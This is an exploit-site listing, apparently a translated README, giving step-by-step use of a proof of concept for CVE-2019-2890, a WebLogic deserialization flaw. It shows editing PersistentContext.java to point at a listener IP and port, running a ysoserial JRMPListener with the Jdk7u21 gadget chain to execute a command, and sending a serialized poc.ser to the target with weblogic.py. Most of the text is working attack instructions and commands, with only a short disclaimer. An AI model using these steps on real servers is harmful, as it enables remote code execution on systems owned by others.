Sploitus

Exploit for CVE-2019-2890

kitploit Β· 2026-08-26

Exploit Code

MARKDOWN41 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-L1NK3RLIN-CVE-2019-2890
## ΠžΡ‚ΠΊΠ°Π· ΠΎΡ‚ отвСтствСнности

Волько для обучСния ΠΈ ΠΎΠ±ΠΌΠ΅Π½Π° ΠΎΠΏΡ‹Ρ‚ΠΎΠΌ. Π—Π° ΠΈΠ½ΠΎΠ΅ использованиС ΠΎΡ‚Π²Π΅Ρ‚ΡΡ‚Π²Π΅Π½Π½ΠΎΡΡ‚ΡŒ нСсётС Π²Ρ‹ сами.

## ПояснСниС

ВсС Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΡ‹Π΅ jar-Ρ„Π°ΠΉΠ»Ρ‹ ΡƒΠΆΠ΅ ΠΈΠΌΠΏΠΎΡ€Ρ‚ΠΈΡ€ΠΎΠ²Π°Π½Ρ‹ Π² ΠΏΡ€ΠΎΠ΅ΠΊΡ‚, Π° Π² качСствС ΠΌΠ΅Ρ‚ΠΎΠ΄Π° эксплуатации ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ΡΡ JRMP ΠΈΠ· yso. ΠŸΡ€ΠΈ ΠΈΠ·ΡƒΡ‡Π΅Π½ΠΈΠΈ ΠΈ ΠΎΡ‚Π»Π°Π΄ΠΊΠ΅ способ эксплуатации ΠΌΠΎΠΆΠ½ΠΎ ΠΈΠ·ΠΌΠ΅Π½ΠΈΡ‚ΡŒ.

Π‘Π½Π°Ρ‡Π°Π»Π° помСститС Ρ„Π°ΠΉΠ» **SerializedSystemIni.dat** ΠΈΠ· ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³Π° weblogic Π² ΠΏΠ°ΠΏΠΊΡƒ **security**.

Π—Π°Ρ‚Π΅ΠΌ ΠΏΠ΅Ρ€Π΅ΠΈΠΌΠ΅Π½ΡƒΠΉΡ‚Π΅ yso Π² **ysoserial.jar** ΠΈ ΠΈΠΌΠΏΠΎΡ€Ρ‚ΠΈΡ€ΡƒΠΉΡ‚Π΅ Π΅Π³ΠΎ Π² ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³ **lib**.

![1](https://assets.kitploit.com/production/public/readmes/28268/6a0be37a1a721c868e67a33ab2695142f691036b935166a4e0740e36066df771.png)

Π”Π°Π»Π΅Π΅ ΡƒΠΊΠ°ΠΆΠΈΡ‚Π΅ IP-адрСс ΠΈ ΠΏΠΎΡ€Ρ‚ Π² ΠΌΠ΅Ρ‚ΠΎΠ΄Π΅ **getObject** Π² Ρ„Π°ΠΉΠ»Π΅ **weblogic/wsee/jaxws/persistence/PersistentContext.java**.

root@kitploit:~
    
    
            try {
                var3.writeObject(Poc.getObject("127.0.0.1:8000"));
            } catch (Exception e) {
                e.printStackTrace();
            }
    

НаконСц, ΡƒΠ΄Π°Π»Ρ‘Π½Π½ΠΎ ΠΏΡ€ΠΎΡΠ»ΡƒΡˆΠΈΠ²Π°ΠΉΡ‚Π΅ Ρ‡Π΅Ρ€Π΅Π· JRMP ΠΈ выполняйтС ΠΊΠΎΠΌΠ°Π½Π΄Ρƒ с использованиСм 7u21.

root@kitploit:~
    
    
    java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
    

ΠŸΠΎΡ€ΡΠ΄ΠΎΠΊ использования: запуститС Poc.java для Π³Π΅Π½Π΅Ρ€Π°Ρ†ΠΈΠΈ сСриализованного Ρ„Π°ΠΉΠ»Π° poc.ser, Π·Π°Ρ‚Π΅ΠΌ Π²Ρ‹ΠΏΠΎΠ»Π½ΠΈΡ‚Π΅:

root@kitploit:~
    
    
    python weblogic.py ip port poc.ser